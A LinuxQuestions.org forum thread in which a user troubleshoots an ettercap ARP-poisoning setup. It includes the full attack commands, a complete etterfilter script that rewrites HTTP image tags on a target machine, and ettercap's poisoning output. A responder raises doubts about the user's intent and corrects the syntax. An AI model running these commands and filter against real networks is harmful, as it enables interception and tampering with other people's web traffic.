LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Software (https://www.linuxquestions.org/questions/linux-software-2/)
-   -   ettercap on fedora 17 (https://www.linuxquestions.org/questions/linux-software-2/ettercap-on-fedora-17-a-4175470064/)

sumeet inani 07-18-2013 08:26 AM
ettercap on fedora 17
 
hi ,
please note that I have two computers on LAN with gateway 192.168.8.1.
So , i am trying out the stuff harmlessly.

I read http://www.irongeek.com/i.php?page=s...ettercapfilter and accordingly tried to change images visible on web page in target computer(windows xp , 192.168.8.184).

I see that 'filter ran' several times is echoed.
Even if URL isn't https , still web page gets loaded slowly incompletely without changed image.
Why did target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert ?

TB0ne 07-18-2013 08:57 AM
Quote:
Originally Posted by sumeet inani (Post 4992543)
hi ,
please note that I have two computers on LAN with gateway 192.168.8.1. So , i am trying out the stuff harmlessly.
...and we have no way of knowing this, or what your intentions are.
Quote:
I read http://www.irongeek.com/i.php?page=s...ettercapfilter and accordingly tried to change images visible on web page in target computer(windows xp , 192.168.8.184).

I see that 'filter ran' several times is echoed. Even if URL isn't https , still web page gets loaded slowly incompletely without changed image.
Why did target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert ?
No idea, since you don't post information about what you did, other than that weblink. Some VERY obvious things:
  • The picture you referenced for the 'filter' doesn't exist/can't be read?
  • You're filtering http, NOT https?
  • You didn't read this part of the page you linked to?
    Quote:
    Originally Posted by Weblink
    Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss

sumeet inani 07-19-2013 05:11 AM
Apropos intentions - I can just say that ettercap tool is available freely and it is choice of any individual to believe or not what I say.
If used maliciously then consequences have to be bore by doer - that I am well aware of.

I read that
Quote:
Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Still , I was expecting to see changed image once on any web page (http://ibnlive.in.com/ in my case).

Have you tried it or do you intend to ?
If yes , then you can help me in solving this . Because , i have followed mentioned tutorial , step by step.


Here is the command I ran
Code:
etterfilter  imag.filter  -o replace.ef
ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef
where imag.filter contained
Code:
       
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                            #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or      #
#  (at your option) any later version.                                    #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  msg("Filter Ran.\n");
}
I conclude that
message 'filter ran' indicates that there is no problem of intervening attributes between img & src which may not cause pattern match , hence no replacement.
i am not aware , if there is some checksum associated which causes browser to disregard replaced packets as garbage.

TB0ne 07-19-2013 09:22 AM
Quote:
Originally Posted by sumeet inani (Post 4993103)
Apropos intentions - I can just say that ettercap tool is available freely and it is choice of any individual to believe or not what I say. If used maliciously then consequences have to be bore by doer - that I am well aware of.
And we all are aware of that, but the LQ Rules specifically mention hacking/cracking, and the fact that such things aren't to be discussed. I am not saying we don't believe you, but that we have no way of KNOWING your intentions.
Quote:
I read that Still , I was expecting to see changed image once on any web page (http://ibnlive.in.com/ in my case). Have you tried it or do you intend to ? If yes , then you can help me in solving this . Because , i have followed mentioned tutorial , step by step.

Here is the command I ran
Code:
etterfilter  imag.filter  -o replace.ef
ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef
where imag.filter contained
Code:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                            #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or      #
#  (at your option) any later version.                                    #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  msg("Filter Ran.\n");
}
I conclude that
message 'filter ran' indicates that there is no problem of intervening attributes between img & src which may not cause pattern match , hence no replacement. i am not aware , if there is some checksum associated which causes browser to disregard replaced packets as garbage.
Well, if you did follow the tutorial, you'll notice that you're missing the backslashes before the end of the img src lines, as they are in the tutorial. You'll also notice this part of the tutorial as well:
Quote:
Originally Posted by Ettercap Page
Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.22.47, we would use this command:

ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
...which specifically addresses the speed issue you mentioned previously, since you're (apparently) specifying a large range of addresses in your command. Also, the command you typed in for your one workstation
Code:
ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef
doesn't match the code that's posted in that tutorial, and uses different options and syntax.

sumeet inani 07-22-2013 01:41 AM
please , pardon my unintended impertinence.
Seems , this is not appropriate place for discusssing this stuff.
Anyway I copied the code ditto from http://www.irongeek.com/i.php?page=s...ettercapfilter
the browsing on target computer was slow though
Code:
ettercap NG-0.7.4_git copyright 2001-2011 ALoR & NaGA

Content filters loaded from ig.ef...
Listening on p5p1... (Ethernet)

  p5p1 ->        6C:3B:E5:20:B2:AD    192.168.8.103    255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.8.184 00:1E:C9:3E:7D:92

 GROUP 2 : 192.168.8.1 1C:E6:C7:52:00:C0
Starting Unified sniffing...
this shows that no other computer on LAN was targeted.
Still , I see source code of target web page mentioning redirected link at one of two img tags.
The one that did not got replaced had additional attributes to img tag other than src.
I have written mail to ettercap.project -at- gmail.com seeking docuentation on etterfilter rules.


All times are GMT -5. The time now is 01:19 PM.